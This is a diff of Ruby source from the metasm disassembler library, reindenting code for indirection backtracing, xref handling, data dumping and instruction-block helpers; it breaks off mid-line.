[Expression[expr.reduce]] + + # solve each indirection sequentially, clone expr for each value (aka cross-product) + result.first.expr_indirections.uniq.each { |i| + next_result = [] + backtrace_indirection(i, maxdepth).each { |rr| + next_result |= result.map { |e| Expression[e.bind(i => rr).reduce] } + } + result = next_result + } + + result.uniq + end + + # returns the array of values pointed by the indirection at its invocation (ind.origin) + # first resolves the pointer using backtrace_value, if it does not point in edata keep the original pointer + # then backtraces from ind.origin until it finds an :w xref origin + # if no :w access is found, returns the value encoded in the raw section data + # TODO handle unaligned (partial?) writes + def backtrace_indirection(ind, maxdepth) + if not ind.origin + puts "backtrace_ind: no origin for #{ind}" if $VERBOSE + return [ind] + end + + ret = [] + + decode_imm = lambda { |addr, len| + edata, foo = get_section_at(addr) + if edata + Expression[ edata.decode_imm("u#{8*len}".to_sym, @cpu.endianness) ] + else + Expression::Unknown + end + } + + # resolve pointers (they may include Indirections) + backtrace_value(ind.target, maxdepth).each { |ptr| + # find write xrefs to the ptr + refs = [] + each_xref(ptr, :w) { |x| + # XXX should be rebacktracked on new xref + next if not @decoded[x.origin] + refs |= [x.origin] + } if ptr != Expression::Unknown + + if refs.empty? + if get_section_at(ptr) + # static data, newer written : return encoded value + ret |= [decode_imm[ptr, ind.len]] + next + else + # unknown pointer : backtrace the indirection, hope it solves itself + initval = ind + end + else + # wait until we find a write xref, then backtrace the written value + initval = true + end + + # wait until we arrive at an xref'ing instruction, then backtrace the written value + backtrace_walk(initval, ind.origin, true, false, nil, maxdepth-1) { |ev, expr, h| + case ev + when :unknown_addr, :maxdepth, :stopaddr puts " backtrace_indirection for #{ind.target} failed: #{ev}" if debug_backtrace - ret |= [Expression::Unknown] - when :end - if not refs.empty? and (expr == true or not need_backtrace(expr)) - if expr == true - # found a path avoiding the :w xrefs, read the encoded initial value - ret |= [decode_imm[ptr, ind.len]] - else - bd = expr.expr_indirections.inject({}) { |h_, i| h_.update i => decode_imm[i.target, i.len] } - ret |= [Expression[expr.bind(bd).reduce]] - end - else - # unknown pointer, backtrace did not resolve... - ret |= [Expression::Unknown] - end - when :di - di = h[:di] - if expr == true - next true if not refs.include? di.address - # find the expression to backtrace: assume this is the :w xref from this di - writes = get_xrefs_rw(di) - writes = writes.find_all { |x_type, x_ptr, x_len| x_type == :w and x_len == ind.len } - if writes.length != 1 - puts "backtrace_ind: incompatible xrefs to #{ptr} from #{di}" if $DEBUG - ret |= [Expression::Unknown] - next false - end - expr = Indirection.new(writes[0][1], ind.len, di.address) - end - expr = backtrace_emu_instr(di, expr) - # may have new indirections... recall bt_value ? - #if not need_backtrace(expr) - if expr.expr_externals.all? { |e| @prog_binding[e] or @function[normalize(e)] } and expr.expr_indirections.empty? - ret |= backtrace_value(expr, maxdepth-1-h[:loopdetect].length) - false - else - expr - end - when :func - next true if expr == true # XXX - expr = backtrace_emu_subfunc(h[:func], h[:funcaddr], h[:addr], expr, ind.origin, maxdepth-h[:loopdetect].length) - #if not need_backtrace(expr) - if expr.expr_externals.all? { |e| @prog_binding[e] or @function[normalize(e)] } and expr.expr_indirections.empty? - ret |= backtrace_value(expr, maxdepth-1-h[:loopdetect].length) - false - else - expr - end - end - } - } - - ret - end - - # creates xrefs, updates addrs_todo, updates instr args - def backtrace_found_result(expr, di, type, origin, len, detached) - n = normalize(expr) - fallthrough = true if type == :x and o = di_at(origin) and not o.opcode.props[:stopexec] and n == o.block.list.last.next_addr # delay_slot - add_xref(n, Xref.new(type, origin, len)) if origin != :default and origin != Expression::Unknown and not fallthrough - unk = true if n == Expression::Unknown - - add_xref(n, Xref.new(:addr, di.address)) if di and di.address != origin and not unk - base = { nil => 'loc', 1 => 'byte', 2 => 'word', 4 => 'dword', 8 => 'qword' }[len] || 'xref' - base = 'sub' if @function[n] - n = Expression[auto_label_at(n, base, 'xref') || n] if not fallthrough - n = Expression[n] - - # update instr args - # TODO trace expression evolution to allow handling of - # mov eax, 28 ; add eax, 4 ; jmp eax - # => mov eax, (loc_xx-4) - if di and not unk # and di.address == origin - @cpu.replace_instr_arg_immediate(di.instruction, expr, n) - end - if @decoded[origin] and not unk - @cpu.backtrace_found_result(self, @decoded[origin], expr, type, len) - end - - # add comment - if type and @decoded[origin] # and not @decoded[origin].instruction.args.include? n - @decoded[origin].add_comment "#{type}#{len}:#{n}" if not fallthrough - end - - # check if target is a string - if di and type == :r and (len == 1 or len == 2) and s = get_section_at(n) - l = s[0].inv_export[s[0].ptr] - case len - when 1; str = s[0].read(32).unpack('C*') - when 2; str = s[0].read(64).unpack('v*') - end - str = str.inject('') { |str_, c| - case c - when 0x20..0x7e, ?\n, ?\r, ?\t; str_ << c - else break str_ - end - } - if str.length >= 4 - di.add_comment "#{'L' if len == 2}#{str.inspect}" - str = 'a_' + str.downcase.delete('^a-z0-9')[0, 12] - if str.length >= 8 and l[0, 5] == 'byte_' - rename_label(l, @program.new_label(str)) - end - end - end - - # XXX all this should be done in backtrace() { } - if type == :x and origin - if detached - o = @decoded[origin] ? origin : di ? di.address : nil # lib function callback have origin == libfuncname, so we must find a block somewhere else - origin = nil - @decoded[o].block.add_to_indirect(normalize(n)) if @decoded[o] and not unk - else - @decoded[origin].block.add_to_normal(normalize(n)) if @decoded[origin] and not unk - end - @addrs_todo << [n, origin] - end - end - - def to_s - a = '' - dump { |l| a << l << "\n" } - a - end - - # dumps the source, optionnally including data - # yields (defaults puts) each line - def dump(dump_data=true, &b) - b ||= lambda { |l| puts l } - @sections.sort_by { |addr, edata| addr.kind_of?(::Integer) ? addr : 0 }.each { |addr, edata| - addr = Expression[addr] if addr.kind_of? ::String - blockoffs = @decoded.values.grep(DecodedInstruction).map { |di| Expression[di.block.address, :-, addr].reduce if di.block_head? }.grep(::Integer).sort.reject { |o| o < 0 or o >= edata.length } - b[@program.dump_section_header(addr, edata)] - if not dump_data and edata.length > 16*1024 and blockoffs.empty? - b["// [#{edata.length} data bytes]"] - next - end - unk_off = 0 # last off displayed - # blocks.sort_by { |b| b.addr }.each { |b| - while unk_off < edata.length - if unk_off == blockoffs.first - blockoffs.shift - di = @decoded[addr+unk_off] - if unk_off != di.block.edata_ptr - b["\n// ------ overlap (#{unk_off-di.block.edata_ptr}) ------"] - elsif di.block.from_normal.kind_of? ::Array - b["\n"] - end - dump_block(di.block, &b) - unk_off += [di.block.bin_length, 1].max - unk_off = blockoffs.first if blockoffs.first and unk_off > blockoffs.first - else - next_off = blockoffs.first || edata.length - if dump_data or next_off - unk_off < 16 - unk_off = dump_data(addr + unk_off, edata, unk_off, &b) - else - b["// [#{next_off - unk_off} data bytes]"] - unk_off = next_off - end - end - end - } - end - - # dumps a block of decoded instructions - def dump_block(block, &b) - b ||= lambda { |l| puts l } - block = @decoded[block].block if @decoded[block] - dump_block_header(block, &b) - block.list.each { |di| b[di.show] } - end - - # shows the xrefs/labels at block start - def dump_block_header(block, &b) - b ||= lambda { |l| puts l } - xr = [] - each_xref(block.address) { |x| - case x.type - when :x; xr << Expression[x.origin] - when :r, :w; xr << "#{x.type}#{x.len}:#{Expression[x.origin]}" - end - } - if not xr.empty? - b["\n// Xrefs: #{xr[0, 8].join(' ')}#{' ...' if xr.length > 8}"] - end - if block.edata.inv_export[block.edata_ptr] - b["\n"] if xr.empty? - label_alias[block.address].each { |name| b["#{name}:"] } - end - if c = @comment[block.address] - c = c.join("\n") if c.kind_of? ::Array - c.each_line { |l| b["// #{l}"] } - end - end - - # dumps data/labels, honours @xrefs.len if exists - # dumps one line only - # stops on end of edata/@decoded/@xref - # returns the next offset to display - # TODO array-style data access - def dump_data(addr, edata, off, &b) - b ||= lambda { |l| puts l } - if l = edata.inv_export[off] - l_list = label_alias[addr].to_a.sort - l = l_list.pop || l - l_list.each { |ll| - b["#{ll}:"] - } - l = (l + ' ').ljust(16) - else l = '' - end - elemlen = 1 # size of each element we dump (db by default) - dumplen = -off % 16 # number of octets to dump - dumplen = 16 if dumplen == 0 - cmt = [] - each_xref(addr) { |x| - dumplen = elemlen = x.len if x.len == 2 or x.len == 4 - cmt << " #{x.type}#{x.len}:#{Expression[x.origin]}" - } - cmt = " ; @#{Expression[addr]}" + cmt.sort[0, 6].join - if r = edata.reloc[off] - dumplen = elemlen = r.type.to_s[1..-1].to_i/8 - end - dataspec = { 1 => 'db ', 2 => 'dw ', 4 => 'dd ', 8 => 'dq ' }[elemlen] - if not dataspec - dataspec = 'db ' - elemlen = 1 - end - l << dataspec - - # dup(?) - if off >= edata.data.length - dups = edata.virtsize - off - @prog_binding.each_value { |a| - tmp = Expression[a, :-, addr].reduce - dups = tmp if tmp.kind_of? ::Integer and tmp > 0 and tmp < dups - } - @xrefs.each_key { |a| - tmp = Expression[a, :-, addr].reduce - dups = tmp if tmp.kind_of? ::Integer and tmp > 0 and tmp < dups - } - dups /= elemlen - dups = 1 if dups < 1 - b[(l + "#{dups} dup(?)").ljust(48) << cmt] - return off + dups*elemlen - end - - vals = [] - edata.ptr = off - dups = dumplen/elemlen - elemsym = "u#{elemlen*8}".to_sym - while edata.ptr < edata.data.length - if vals.length > dups and vals.last != vals.first - # we have a dup(), unread the last element which is different - vals.pop - addr = Expression[addr, :-, elemlen].reduce - edata.ptr -= elemlen - break - end - break if vals.length == dups and vals.uniq.length > 1 - vals << edata.decode_imm(elemsym, @cpu.endianness) - addr += elemlen - if i = (1-elemlen..0).find { |i_| - t = addr + i_ - @xrefs[t] or @decoded[t] or edata.reloc[edata.ptr+i_] or edata.inv_export[edata.ptr+i_] - } - # i < 0 - edata.ptr += i - addr += i - break - end - break if edata.reloc[edata.ptr-elemlen] - end - - # line of repeated value => dup() - if vals.length > 8 and vals.uniq.length == 1 - b[(l << "#{vals.length} dup(#{Expression[vals.first]})").ljust(48) << cmt] - return edata.ptr - end - - # recognize strings - vals = vals.inject([]) { |vals_, value| - if (elemlen == 1 or elemlen == 2) - case value - when 0x20..0x7e, 0x0a, 0x0d - if vals_.last.kind_of? ::String; vals_.last << value ; vals_ - else vals_ << value.chr - end - else vals_ << value - end - else vals_ << value - end - } - - vals.map! { |value| - if value.kind_of? ::String - if value.length > 2 # or value == vals.first or value == vals.last # if there is no xref, don't care - value.inspect - else - value.unpack('C*').map { |c| Expression[c] } - end - else - Expression[value] - end - } - vals.flatten! - - b[(l << vals.join(', ')).ljust(48) << cmt] - - edata.ptr - end - - def decompiler - parse_c '' if not c_parser - @decompiler ||= Decompiler.new(self) - end - def decompiler=(dc) - @decompiler = dc - end - def decompile(*addr) - decompiler.decompile(*addr) - end - def decompile_func(addr) - decompiler.decompile_func(addr) - end - - # allows us to be AutoExe.loaded - def self.autoexe_load(f, &b) - d = load(f, &b) - d.program - end + ret |= [Expression::Unknown] + when :end + if not refs.empty? and (expr == true or not need_backtrace(expr)) + if expr == true + # found a path avoiding the :w xrefs, read the encoded initial value + ret |= [decode_imm[ptr, ind.len]] + else + bd = expr.expr_indirections.inject({}) { |h_, i| h_.update i => decode_imm[i.target, i.len] } + ret |= [Expression[expr.bind(bd).reduce]] + end + else + # unknown pointer, backtrace did not resolve... + ret |= [Expression::Unknown] + end + when :di + di = h[:di] + if expr == true + next true if not refs.include? di.address + # find the expression to backtrace: assume this is the :w xref from this di + writes = get_xrefs_rw(di) + writes = writes.find_all { |x_type, x_ptr, x_len| x_type == :w and x_len == ind.len } + if writes.length != 1 + puts "backtrace_ind: incompatible xrefs to #{ptr} from #{di}" if $DEBUG + ret |= [Expression::Unknown] + next false + end + expr = Indirection.new(writes[0][1], ind.len, di.address) + end + expr = backtrace_emu_instr(di, expr) + # may have new indirections... recall bt_value ? + #if not need_backtrace(expr) + if expr.expr_externals.all? { |e| @prog_binding[e] or @function[normalize(e)] } and expr.expr_indirections.empty? + ret |= backtrace_value(expr, maxdepth-1-h[:loopdetect].length) + false + else + expr + end + when :func + next true if expr == true # XXX + expr = backtrace_emu_subfunc(h[:func], h[:funcaddr], h[:addr], expr, ind.origin, maxdepth-h[:loopdetect].length) + #if not need_backtrace(expr) + if expr.expr_externals.all? { |e| @prog_binding[e] or @function[normalize(e)] } and expr.expr_indirections.empty? + ret |= backtrace_value(expr, maxdepth-1-h[:loopdetect].length) + false + else + expr + end + end + } + } + + ret + end + + # creates xrefs, updates addrs_todo, updates instr args + def backtrace_found_result(expr, di, type, origin, len, detached) + n = normalize(expr) + fallthrough = true if type == :x and o = di_at(origin) and not o.opcode.props[:stopexec] and n == o.block.list.last.next_addr # delay_slot + add_xref(n, Xref.new(type, origin, len)) if origin != :default and origin != Expression::Unknown and not fallthrough + unk = true if n == Expression::Unknown + + add_xref(n, Xref.new(:addr, di.address)) if di and di.address != origin and not unk + base = { nil => 'loc', 1 => 'byte', 2 => 'word', 4 => 'dword', 8 => 'qword' }[len] || 'xref' + base = 'sub' if @function[n] + n = Expression[auto_label_at(n, base, 'xref') || n] if not fallthrough + n = Expression[n] + + # update instr args + # TODO trace expression evolution to allow handling of + # mov eax, 28 ; add eax, 4 ; jmp eax + # => mov eax, (loc_xx-4) + if di and not unk # and di.address == origin + @cpu.replace_instr_arg_immediate(di.instruction, expr, n) + end + if @decoded[origin] and not unk + @cpu.backtrace_found_result(self, @decoded[origin], expr, type, len) + end + + # add comment + if type and @decoded[origin] # and not @decoded[origin].instruction.args.include? n + @decoded[origin].add_comment "#{type}#{len}:#{n}" if not fallthrough + end + + # check if target is a string + if di and type == :r and (len == 1 or len == 2) and s = get_section_at(n) + l = s[0].inv_export[s[0].ptr] + case len + when 1; str = s[0].read(32).unpack('C*') + when 2; str = s[0].read(64).unpack('v*') + end + str = str.inject('') { |str_, c| + case c + when 0x20..0x7e, ?\n, ?\r, ?\t; str_ << c + else break str_ + end + } + if str.length >= 4 + di.add_comment "#{'L' if len == 2}#{str.inspect}" + str = 'a_' + str.downcase.delete('^a-z0-9')[0, 12] + if str.length >= 8 and l[0, 5] == 'byte_' + rename_label(l, @program.new_label(str)) + end + end + end + + # XXX all this should be done in backtrace() { } + if type == :x and origin + if detached + o = @decoded[origin] ? origin : di ? di.address : nil # lib function callback have origin == libfuncname, so we must find a block somewhere else + origin = nil + @decoded[o].block.add_to_indirect(normalize(n)) if @decoded[o] and not unk + else + @decoded[origin].block.add_to_normal(normalize(n)) if @decoded[origin] and not unk + end + @addrs_todo << [n, origin] + end + end + + def to_s + a = '' + dump { |l| a << l << "\n" } + a + end + + # dumps the source, optionnally including data + # yields (defaults puts) each line + def dump(dump_data=true, &b) + b ||= lambda { |l| puts l } + @sections.sort_by { |addr, edata| addr.kind_of?(::Integer) ? addr : 0 }.each { |addr, edata| + addr = Expression[addr] if addr.kind_of? ::String + blockoffs = @decoded.values.grep(DecodedInstruction).map { |di| Expression[di.block.address, :-, addr].reduce if di.block_head? }.grep(::Integer).sort.reject { |o| o < 0 or o >= edata.length } + b[@program.dump_section_header(addr, edata)] + if not dump_data and edata.length > 16*1024 and blockoffs.empty? + b["// [#{edata.length} data bytes]"] + next + end + unk_off = 0 # last off displayed + # blocks.sort_by { |b| b.addr }.each { |b| + while unk_off < edata.length + if unk_off == blockoffs.first + blockoffs.shift + di = @decoded[addr+unk_off] + if unk_off != di.block.edata_ptr + b["\n// ------ overlap (#{unk_off-di.block.edata_ptr}) ------"] + elsif di.block.from_normal.kind_of? ::Array + b["\n"] + end + dump_block(di.block, &b) + unk_off += [di.block.bin_length, 1].max + unk_off = blockoffs.first if blockoffs.first and unk_off > blockoffs.first + else + next_off = blockoffs.first || edata.length + if dump_data or next_off - unk_off < 16 + unk_off = dump_data(addr + unk_off, edata, unk_off, &b) + else + b["// [#{next_off - unk_off} data bytes]"] + unk_off = next_off + end + end + end + } + end + + # dumps a block of decoded instructions + def dump_block(block, &b) + b ||= lambda { |l| puts l } + block = @decoded[block].block if @decoded[block] + dump_block_header(block, &b) + block.list.each { |di| b[di.show] } + end + + # shows the xrefs/labels at block start + def dump_block_header(block, &b) + b ||= lambda { |l| puts l } + xr = [] + each_xref(block.address) { |x| + case x.type + when :x; xr << Expression[x.origin] + when :r, :w; xr << "#{x.type}#{x.len}:#{Expression[x.origin]}" + end + } + if not xr.empty? + b["\n// Xrefs: #{xr[0, 8].join(' ')}#{' ...' if xr.length > 8}"] + end + if block.edata.inv_export[block.edata_ptr] + b["\n"] if xr.empty? + label_alias[block.address].each { |name| b["#{name}:"] } + end + if c = @comment[block.address] + c = c.join("\n") if c.kind_of? ::Array + c.each_line { |l| b["// #{l}"] } + end + end + + # dumps data/labels, honours @xrefs.len if exists + # dumps one line only + # stops on end of edata/@decoded/@xref + # returns the next offset to display + # TODO array-style data access + def dump_data(addr, edata, off, &b) + b ||= lambda { |l| puts l } + if l = edata.inv_export[off] + l_list = label_alias[addr].to_a.sort + l = l_list.pop || l + l_list.each { |ll| + b["#{ll}:"] + } + l = (l + ' ').ljust(16) + else l = '' + end + elemlen = 1 # size of each element we dump (db by default) + dumplen = -off % 16 # number of octets to dump + dumplen = 16 if dumplen == 0 + cmt = [] + each_xref(addr) { |x| + dumplen = elemlen = x.len if x.len == 2 or x.len == 4 + cmt << " #{x.type}#{x.len}:#{Expression[x.origin]}" + } + cmt = " ; @#{Expression[addr]}" + cmt.sort[0, 6].join + if r = edata.reloc[off] + dumplen = elemlen = r.type.to_s[1..-1].to_i/8 + end + dataspec = { 1 => 'db ', 2 => 'dw ', 4 => 'dd ', 8 => 'dq ' }[elemlen] + if not dataspec + dataspec = 'db ' + elemlen = 1 + end + l << dataspec + + # dup(?) + if off >= edata.data.length + dups = edata.virtsize - off + @prog_binding.each_value { |a| + tmp = Expression[a, :-, addr].reduce + dups = tmp if tmp.kind_of? ::Integer and tmp > 0 and tmp < dups + } + @xrefs.each_key { |a| + tmp = Expression[a, :-, addr].reduce + dups = tmp if tmp.kind_of? ::Integer and tmp > 0 and tmp < dups + } + dups /= elemlen + dups = 1 if dups < 1 + b[(l + "#{dups} dup(?)").ljust(48) << cmt] + return off + dups*elemlen + end + + vals = [] + edata.ptr = off + dups = dumplen/elemlen + elemsym = "u#{elemlen*8}".to_sym + while edata.ptr < edata.data.length + if vals.length > dups and vals.last != vals.first + # we have a dup(), unread the last element which is different + vals.pop + addr = Expression[addr, :-, elemlen].reduce + edata.ptr -= elemlen + break + end + break if vals.length == dups and vals.uniq.length > 1 + vals << edata.decode_imm(elemsym, @cpu.endianness) + addr += elemlen + if i = (1-elemlen..0).find { |i_| + t = addr + i_ + @xrefs[t] or @decoded[t] or edata.reloc[edata.ptr+i_] or edata.inv_export[edata.ptr+i_] + } + # i < 0 + edata.ptr += i + addr += i + break + end + break if edata.reloc[edata.ptr-elemlen] + end + + # line of repeated value => dup() + if vals.length > 8 and vals.uniq.length == 1 + b[(l << "#{vals.length} dup(#{Expression[vals.first]})").ljust(48) << cmt] + return edata.ptr + end + + # recognize strings + vals = vals.inject([]) { |vals_, value| + if (elemlen == 1 or elemlen == 2) + case value + when 0x20..0x7e, 0x0a, 0x0d + if vals_.last.kind_of? ::String; vals_.last << value ; vals_ + else vals_ << value.chr + end + else vals_ << value + end + else vals_ << value + end + } + + vals.map! { |value| + if value.kind_of? ::String + if value.length > 2 # or value == vals.first or value == vals.last # if there is no xref, don't care + value.inspect + else + value.unpack('C*').map { |c| Expression[c] } + end + else + Expression[value] + end + } + vals.flatten! + + b[(l << vals.join(', ')).ljust(48) << cmt] + + edata.ptr + end + + def decompiler + parse_c '' if not c_parser + @decompiler ||= Decompiler.new(self) + end + def decompiler=(dc) + @decompiler = dc + end + def decompile(*addr) + decompiler.decompile(*addr) + end + def decompile_func(addr) + decompiler.decompile_func(addr) + end + + # allows us to be AutoExe.loaded + def self.autoexe_load(f, &b) + d = load(f, &b) + d.program + end end end diff --git a/lib/metasm/metasm/disassemble_api.rb b/lib/metasm/metasm/disassemble_api.rb index 76f459f9b447d..01713e0b7e5da 100644 --- a/lib/metasm/metasm/disassemble_api.rb +++ b/lib/metasm/metasm/disassemble_api.rb @@ -7,1274 +7,1274 @@ module Metasm class InstructionBlock - # adds an address to the from_normal/from_subfuncret list - def add_from(addr, type=:normal) - send "add_from_#{type}", addr - end - def add_from_normal(addr) - @from_normal ||= [] - @from_normal |= [addr] - end - def add_from_subfuncret(addr) - @from_subfuncret ||= [] - @from_subfuncret |= [addr] - end - def add_from_indirect(addr) - @from_indirect ||= [] - @from_indirect |= [addr] - end - # iterates over every from address, yields [address, type in [:normal, :subfuncret, :indirect]] - def each_from - each_from_normal { |a| yield a, :normal } - each_from_subfuncret { |a| yield a, :subfuncret } - each_from_indirect { |a| yield a, :indirect } - end - def each_from_normal(&b) - @from_normal.each(&b) if from_normal - end - def each_from_subfuncret(&b) - @from_subfuncret.each(&b) if from_subfuncret - end - def each_from_indirect(&b) - @from_indirect.each(&b) if from_indirect - end - - def add_to(addr, type=:normal) - send "add_to_#{type}", addr - end - def add_to_normal(addr) - @to_normal ||= [] - @to_normal |= [addr] - end - def add_to_subfuncret(addr) - @to_subfuncret ||= [] - @to_subfuncret |= [addr] - end - def add_to_indirect(addr) - @to_indirect ||= [] - @to_indirect |= [addr] - end - def each_to - each_to_normal { |a| yield a, :normal } - each_to_subfuncret { |a| yield a, :subfuncret } - each_to_indirect { |a| yield a, :indirect } - end - def each_to_normal(&b) - @to_normal.each(&b) if to_normal - end - def each_to_subfuncret(&b) - @to_subfuncret.each(&b) if to_subfuncret - end - def each_to_indirect(&b) - @to_indirect.each(&b) if to_indirect - end - - # yields all from that are from the same function - def each_from_samefunc(dasm, &b) - return if dasm.function[address] - @from_subfuncret.each(&b) if from_subfuncret - @from_normal.each(&b) if from_normal - end - - # yields all from that are not in the same subfunction as this block - def each_from_otherfunc(dasm, &b) - @from_normal.each(&b) if from_normal and dasm.function[address] - @from_subfuncret.each(&b) if from_subfuncret and dasm.function[address] - @from_indirect.each(&b) if from_indirect - end - - # yields all to that are in the same subfunction as this block - def each_to_samefunc(dasm) - each_to { |to, type| - next if type != :normal and type != :subfuncret - to = dasm.normalize(to) - yield to if not dasm.function[to] - } - end - - # yields all to that are not in the same subfunction as this block - def each_to_otherfunc(dasm) - each_to { |to, type| - to = dasm.normalize(to) - yield to if type == :indirect or dasm.function[to] or not dasm.decoded[to] - } - end + # adds an address to the from_normal/from_subfuncret list + def add_from(addr, type=:normal) + send "add_from_#{type}", addr + end + def add_from_normal(addr) + @from_normal ||= [] + @from_normal |= [addr] + end + def add_from_subfuncret(addr) + @from_subfuncret ||= [] + @from_subfuncret |= [addr] + end + def add_from_indirect(addr) + @from_indirect ||= [] + @from_indirect |= [addr] + end + # iterates over every from address, yields [address, type in [:normal, :subfuncret, :indirect]] + def each_from + each_from_normal { |a| yield a, :normal } + each_from_subfuncret { |a| yield a, :subfuncret } + each_from_indirect { |a| yield a, :indirect } + end + def each_from_normal(&b) + @from_normal.each(&b) if from_normal + end + def each_from_subfuncret(&b) + @from_subfuncret.each(&b) if from_subfuncret + end + def each_from_indirect(&b) + @from_indirect.each(&b) if from_indirect + end + + def add_to(addr, type=:normal) + send "add_to_#{type}", addr + end + def add_to_normal(addr) + @to_normal ||= [] + @to_normal |= [addr] + end + def add_to_subfuncret(addr) + @to_subfuncret ||= [] + @to_subfuncret |= [addr] + end + def add_to_indirect(addr) + @to_indirect ||= [] + @to_indirect |= [addr] + end + def each_to + each_to_normal { |a| yield a, :normal } + each_to_subfuncret { |a| yield a, :subfuncret } + each_to_indirect { |a| yield a, :indirect } + end + def each_to_normal(&b) + @to_normal.each(&b) if to_normal + end + def each_to_subfuncret(&b) + @to_subfuncret.each(&b) if to_subfuncret + end + def each_to_indirect(&b) + @to_indirect.each(&b) if to_indirect + end + + # yields all from that are from the same function + def each_from_samefunc(dasm, &b) + return if dasm.function[address] + @from_subfuncret.each(&b) if from_subfuncret + @from_normal.each(&b) if from_normal + end + + # yields all from that are not in the same subfunction as this block + def each_from_otherfunc(dasm, &b) + @from_normal.each(&b) if from_normal and dasm.function[address] + @from_subfuncret.each(&b) if from_subfuncret and dasm.function[address] + @from_indirect.each(&b) if from_indirect + end + + # yields all to that are in the same subfunction as this block + def each_to_samefunc(dasm) + each_to { |to, type| + next if type != :normal and type != :subfuncret + to = dasm.normalize(to) + yield to if not dasm.function[to] + } + end + + # yields all to that are not in the same subfunction as this block + def each_to_otherfunc(dasm) + each_to { |to, type| + to = dasm.normalize(to) + yield to if type == :indirect or dasm.function[to] or not dasm.decoded[to] + } + end end class DecodedInstruction - # checks if this instruction is the first of its IBlock - def block_head? - self == @block.list.first - end + # checks if this instruction is the first of its IBlock + def block_head? + self == @block.list.first + end end class CPU - # compat alias, for scripts using older version of metasm - def get_backtrace_binding(di) backtrace_binding(di) end - - # return something like backtrace_binding in the forward direction - # set pc_reg to some reg name (eg :pc) to include effects on the instruction pointer - def get_fwdemu_binding(di, pc_reg=nil) - fdi = di.backtrace_binding ||= get_backtrace_binding(di) - # find self-updated regs & revert them in simultaneous affectations - # XXX handles only a <- a+i for now, this covers all useful cases (except imul eax, eax, 42 jz foobar) - fdi.keys.grep(::Symbol).each { |s| - val = Expression[fdi[s]] - next if val.lexpr != s or (val.op != :+ and val.op != :-) #or not val.rexpr.kind_of? ::Integer - fwd = { s => val } - inv = { s => val.dup } - inv[s].op = ((inv[s].op == :+) ? :- : :+) - nxt = {} - fdi.each { |k, v| - if k == s - nxt[k] = v - else - k = k.bind(fwd).reduce_rec if k.kind_of? Indirection - nxt[k] = Expression[Expression[v].bind(inv).reduce_rec] - end - } - fdi = nxt - } - if pc_reg - if di.opcode.props[:setip] - xr = get_xrefs_x(nil, di) - if xr and xr.length == 1 - fdi[pc_reg] = xr[0] - else - fdi[:incomplete_binding] = Expression[1] - end - else - fdi[pc_reg] = Expression[pc_reg, :+, di.bin_length] - end - end - fdi - end + # compat alias, for scripts using older version of metasm + def get_backtrace_binding(di) backtrace_binding(di) end + + # return something like backtrace_binding in the forward direction + # set pc_reg to some reg name (eg :pc) to include effects on the instruction pointer + def get_fwdemu_binding(di, pc_reg=nil) + fdi = di.backtrace_binding ||= get_backtrace_binding(di) + # find self-updated regs & revert them in simultaneous affectations + # XXX handles only a <- a+i for now, this covers all useful cases (except imul eax, eax, 42 jz foobar) + fdi.keys.grep(::Symbol).each { |s| + val = Expression[fdi[s]] + next if val.lexpr != s or (val.op != :+ and val.op != :-) #or not val.rexpr.kind_of? ::Integer + fwd = { s => val } + inv = { s => val.dup } + inv[s].op = ((inv[s].op == :+) ? :- : :+) + nxt = {} + fdi.each { |k, v| + if k == s + nxt[k] = v + else + k = k.bind(fwd).reduce_rec if k.kind_of? Indirection + nxt[k] = Expression[Expression[v].bind(inv).reduce_rec] + end + } + fdi = nxt + } + if pc_reg + if di.opcode.props[:setip] + xr = get_xrefs_x(nil, di) + if xr and xr.length == 1 + fdi[pc_reg] = xr[0] + else + fdi[:incomplete_binding] = Expression[1] + end + else + fdi[pc_reg] = Expression[pc_reg, :+, di.bin_length] + end + end + fdi + end end class Disassembler - # access the default value for @@backtrace_maxblocks for newly created Disassemblers - def self.backtrace_maxblocks ; @@backtrace_maxblocks ; end - def self.backtrace_maxblocks=(b) ; @@backtrace_maxblocks = b ; end - - # returns the dasm section's edata containing addr - # its #ptr points to addr - # returns the 1st element of #get_section_at - def get_edata_at(addr) - if s = get_section_at(addr) - s[0] - end - end - - # returns the DecodedInstruction at addr if it exists - def di_at(addr) - di = @decoded[addr] || @decoded[normalize(addr)] if addr - di if di.kind_of? DecodedInstruction - end - - # returns the InstructionBlock containing the address at addr - def block_at(addr) - di = di_at(addr) - di.block if di - end - - # returns the DecodedFunction at addr if it exists - def function_at(addr) - f = @function[addr] || @function[normalize(addr)] if addr - f if f.kind_of? DecodedFunction - end - - # returns the DecodedInstruction covering addr - # returns one at starting nearest addr if multiple are available (overlapping instrs) - def di_including(addr) - return if not addr - addr = normalize(addr) - if off = (0...16).find { |o| @decoded[addr-o].kind_of? DecodedInstruction and @decoded[addr-o].bin_length > o } - @decoded[addr-off] - end - end - - # returns the InstructionBlock containing the byte at addr - # returns the one of di_including() on multiple matches (overlapping instrs) - def block_including(addr) - di = di_including(addr) - di.block if di - end - - # returns the DecodedFunction including this byte - # return the one of find_function_start() if multiple are possible (block shared by multiple funcs) - def function_including(addr) - return if not di = di_including(addr) - function_at(find_function_start(di.address)) - end - - # yields every InstructionBlock - # returns the list of IBlocks - def each_instructionblock - ret = [] - @decoded.each { |addr, di| - next if not di.kind_of? DecodedInstruction or not di.block_head? - ret << di.block - yield di.block if block_given? - } - ret - end - alias instructionblocks each_instructionblock - - # return a backtrace_binding reversed (akin to code emulation) (but not really) - def get_fwdemu_binding(di, pc=nil) - @cpu.get_fwdemu_binding(di, pc) - end - - # reads len raw bytes from the mmaped address space - def read_raw_data(addr, len) - if e = get_section_at(addr) - e[0].read(len) - end - end - - # read an int of arbitrary type (:u8, :i32, ...) - def decode_int(addr, type) - type = "u#{type*8}".to_sym if type.kind_of? Integer - if e = get_section_at(addr) - e[0].decode_imm(type, @cpu.endianness) - end - end - - # read a byte at address addr - def decode_byte(addr) - decode_int(addr, :u8) - end - - # read a dword at address addr - # the dword is cpu-sized (eg 32 or 64bits) - def decode_dword(addr) - decode_int(addr, @cpu.size/8) - end - - # read a zero-terminated string from addr - # if no terminal 0 is found, return nil - def decode_strz(addr, maxsz=4096) - if e = get_section_at(addr) - str = e[0].read(maxsz).to_s - return if not len = str.index(?\0) - str[0, len] - end - end - - # read a zero-terminated wide string from addr - # return nil if no terminal found - def decode_wstrz(addr, maxsz=4096) - if e = get_section_at(addr) - str = e[0].read(maxsz).to_s - return if not len = str.unpack('v*').index(0) - str[0, 2*len] - end - end - - # disassembles one instruction at address - # returns nil if no instruction can be decoded there - # does not update any internal state of the disassembler, nor reuse the @decoded cache - def disassemble_instruction(addr) - if e = get_section_at(addr) - @cpu.decode_instruction(e[0], 